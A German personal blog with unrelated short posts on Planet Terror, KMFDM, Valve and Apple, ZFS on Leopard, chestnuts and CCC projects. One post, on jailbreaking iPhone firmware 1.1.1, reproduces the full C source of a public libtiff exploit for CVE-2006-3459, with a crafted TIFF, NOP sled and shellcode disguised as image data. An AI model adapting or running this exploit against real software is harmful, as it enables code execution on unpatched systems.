Am Wochenende hab ich endlich Planet Terror gesehen. Ich finde das ist eine Art Film die noch gefehlt hat.
Trash auf ganz hohem Niveau, klasse Schauspieler die in einem Film mitspielen der auf dreckig und alt getrimmt ist, mit einem Drehbuch das sich einem Fussnaegel aufrollen. Sprueche und Handlungen sind total schlecht, aber so uebertrieben schlecht das es schon fast wieder gut ist.
Ausserdem sieht man ein paar bekannte Gesichter, zb der Sheriff (Earl McGraw).
Gute arbeit kann ich nur jedem empfehlen. Ausserdem hoffe ich das Machete und Werewolf Women of the SS verfilmt wird.
Durch einen Tiff Exploit mit zuvor gesetztem Symlink in der Firmware 1.0.2 ist es wohl jetzt gelungen das die iPhone Firmware 1.1.1 wieder 3th Apps laufen laesst. Das freut mich ungemeint, da das Deutsche iPhone wohl schon mit der Firmware 1.1.1 ausgeliefert wird. Der Tiff Exploit scheint auch fuer den iPod Touch zu funktionieren.
Vor ein paar Tagen hat auch schon ein Hacker aus Vietnam gebloggt das er sein iPhone mit der Firmware 1.1.1 erfolgreich geunlocked hat. Dafuer gibt es aber leider noch keinen Beweiss.
Der Code vom Tiff Exploit ist schon sehr lange bekannt und wurde auch schon zum PSP Hacken benutzt, um ihn fuers iPhone scharf zu machen musst man ihn noch auf die ARM CPU anpassen und so in etwa sieht der Tiff Exploit aus:
#include
#include
#include "/sw/include/tiffio.h"
#include
#include
/*
* basic exploit for CVE-2006-3459.
*
* $ ./a.out
* [*] creating exploit.tif, target address: 0xb7959000
* [*] marker tag found at offset 524418.
* [*] success.
* $ display exploit.tif
* uid=1000(taviso) gid=100(users) groups=10(wheel)
*
* -- taviso@gentoo.org
*/
/* size of nop sled */
//#define SLEDSIZ (2048 << 8)
#define SLEDSIZ 0
/* get this address by printing tif->tif_base in a debugger */
#define RETADDR (0xb7919000 + SLEDSIZ/2)
#define MARKER 0xc0de /* this must be unique, make it anything */
unsigned char shellcode[] =
"\x20\x08\xa0\xe1\x04\xf0\x1f\xe5\x74\xf9\x9e\x31\x44\x44\xea\x03"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
TIFFFieldInfo badfield = {
MARKER, /* a unique unsigned short we search for */
100, /* number of shorts to read onto stack */
100, /* number we want to write into file */
TIFF_SHORT, /* data type */
FIELD_CUSTOM, /* field bit */
1, /* okay to change? */
0, /* passcount */
"Exploit" /* a name, unused */
};
int main(int argc, char **argv)
{
TIFF *tif;
FILE *mod;
unsigned char *buf;
unsigned short d;
unsigned f[badfield.field_readcount], i;
fprintf(stderr, "[*] creating exploit.tif, target address: %p\n", RETADDR);
/* prepare a buffer containing address of shellcode */
for (i = 0; i < badfield.field_readcount; i++)
f[i] = RETADDR;
/* open the target exploit file */
if ((tif = TIFFOpen("exploit.tif", "w")) == NULL) {
fprintf(stderr, "[!] failed to open target.\n");
return 1;
}
/* teach libtiff about made up tag */
TIFFMergeFieldInfo(tif, &badfield, 1);
/* install basic required tags */
TIFFSetField(tif, TIFFTAG_IMAGEWIDTH, SLEDSIZ + sizeof(shellcode));
TIFFSetField(tif, TIFFTAG_IMAGELENGTH, 1);
TIFFSetField(tif, TIFFTAG_COMPRESSION, COMPRESSION_NONE);
TIFFSetField(tif, TIFFTAG_PHOTOMETRIC, PHOTOMETRIC_MINISBLACK);
TIFFSetField(tif, TIFFTAG_PLANARCONFIG, PLANARCONFIG_CONTIG);
/* now send buffer containing return addresses */
TIFFSetField(tif, MARKER, &f);
if ((buf = malloc(SLEDSIZ + sizeof(shellcode))) == NULL) {
fprintf(stderr, "[!] sorry, memory allocation error.\n");
}
memset(buf, 0x90, SLEDSIZ);
memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
/* disguise nop sled and shellcode as image data */
TIFFWriteEncodedStrip(tif, 0, buf, SLEDSIZ + sizeof(shellcode));
TIFFClose(tif);
/* okay, now open the file to find the marker taag */
if ((mod = fopen("exploit.tif", "r+")) == NULL) {
fprintf(stderr, "[!] failed to open target.\n");
return 1;
}
/* try to find the MARKER by continually reading shorts. */
/* yes, this is ugly. */
while (true) {
if (fread(&d, sizeof(short), 1, mod) < 1) {
fprintf(stderr, "[!] failed to find marker.\n");
return 1;
}
if (d == MARKER) {
fprintf(stderr, "[*] marker tag found at offset %d.\n",
ftell(mod) - sizeof(short));
/* rewind ready to overwrite it */
if (fseek(mod, - sizeof(short), SEEK_CUR) == -1) {
fprintf(stderr, "[!] failed to reposition file.\n");
return 1;
}
/* i'll use dot range */
d = TIFFTAG_DOTRANGE;
/* write it in */
if (fwrite(&d, sizeof(short), 1, mod) < 1) {
fprintf(stderr, "[!] failed to write new tag number.\n");
}
break;
} else {
if (fseek(mod, - sizeof(short) + 1, SEEK_CUR) == -1) {
fprintf(stderr, "[!] failed to reposition file.\n");
return 1;
}
}
}
fclose(mod);
fprintf(stderr, "[*] success.\n");
return 0;
}
Gabe Newell, fuer mich eine der groessten Pfeifen im Spielegeschaeft, spaetestens nach dem Quellcode klau von Half-Life 2 kann ich den Typ nicht mehr ernst nehmen, hat jetzt in einem Interview erzaehlt das zu Half-Life Entwicklungszeiten Gespraeche mit Apple im gang waren.
Als man Gabe fragt warum es nie ein Mac Version von Half-Life gab erzaehlt er folgendes:
…we have this pattern with Apple, where we meet with them, people there go “wow, gaming is incredibly important, we should do something with gaming”. And then we’ll say, “OK, here are three things you could do to make that better”, and then they say OK, and then we never see them again.
So sieht die Geschichte aus Gabes Sicht aus. Inside Mac Games erzaehlt aber jetzt das Valve fuer den Port von Half-Life von Apple 1 Millionen Dollar haben wollte. Nun wenn man dieses kleine unwichtige Detail miteinbezieht kann man verstehen warum sich Apple nicht mehr gemeldet hat.
Wie ich jetzt herausgefunden habe ist diese Poster das echte und zeigt deutlich zu sehen den geheimen Titel des neuen J. J. Abrams Film.
KMFDM haben ihr zwanzigstes Album vor etwa einem Monat veroeffentlicht. Als alter KMFDM Fan finde ich dieses Album genial, der Track Tohuvabohu zum gleichnamigen Album sollte man sich als erstes anhoeren wenn man nicht weiss wie sich KMFDM ueberhaupt anhoeren. Auf der Hau Ruck Tour hab ich sie vor einiger Zeit in Koeln gesehen, Live sind sie genau so perfekt wie ihre Alben kann ich nur sagen. Leider gibts zu diesem Album wohl keine Tour, trotzdem wuerde ich mich freuen diese Band nochmal Live spielen zu sehen. Wie sich KMFDM auf dem Album am besten selbst beschreibt nehmen sie aus allen Musikrichtungen das Beste und kombinieren es zu einem Ueberschall tritt in den Arsch. Fuer mich hoert es sich genau so an und faellt in die Musik Kategorie Industrial.
Apple gab gestern die ZFS Developer Preview 1.1 fuer Leopard raus. Leopard kann zurzeit nur ZFS lesen, mit diesem Update kann es auch auf ZFS schreiben. Vielleicht ist es ja sogar schon in der Final mit drin, die diesen Monat noch ausgeliefert werden soll. Man vermutet das es der 26. Oktober wird an dem das Betriebsystem freigegeben wird.
Seit 17 Jahren sind wir alle wieder zusammen in Deutschland, nicht mehr getrennt durch eine Mauer. Fuer mich ist dieser Tag aber noch mehr als nur die Wiedervereinigung von Deutschland, es ist David Hasselhoffs Tag. Er hat die Leute dazu gebracht die Mauer abzureissen als er auf ihr gespielt hatte. Danke an ihn und das was er fuer Deutschland getan hat.
Ich bin seit ein paar Wochen bin ich immer mal wieder im Wald um Kesten (Maronen) zu sammeln. Gestern waren sie schon fast alle aus ihrer Schale gekommen und lagen auf dem Waldboden herum, man musste sie nur noch aufsammeln. Viele machen die Kesten im Backofen, ich mag sie lieber aus dem Topf, einfach Salz ins Wasser, Kesten ins Wasser und dann ca 20 min Kochen lassen.
Der Planet! kann endlich UTF-8, keine Fragezeichen mehr wo normal Umlaute stehen sollten, Applaus bitte dafuer.
Nebenbei versuche ich immer wenn zeit ist eine neue uberarbeitete Version der CCC-Trier Seite zu machen die alles Nahtloser zusammenfuehrt und uebersichtlicher werden soll.
bitkanone.ccc.de ist ein neues Projekt des CCC und haelt uns auf dem laufenden zur Deutschen Politik in Verbindung unserer Netzwelt.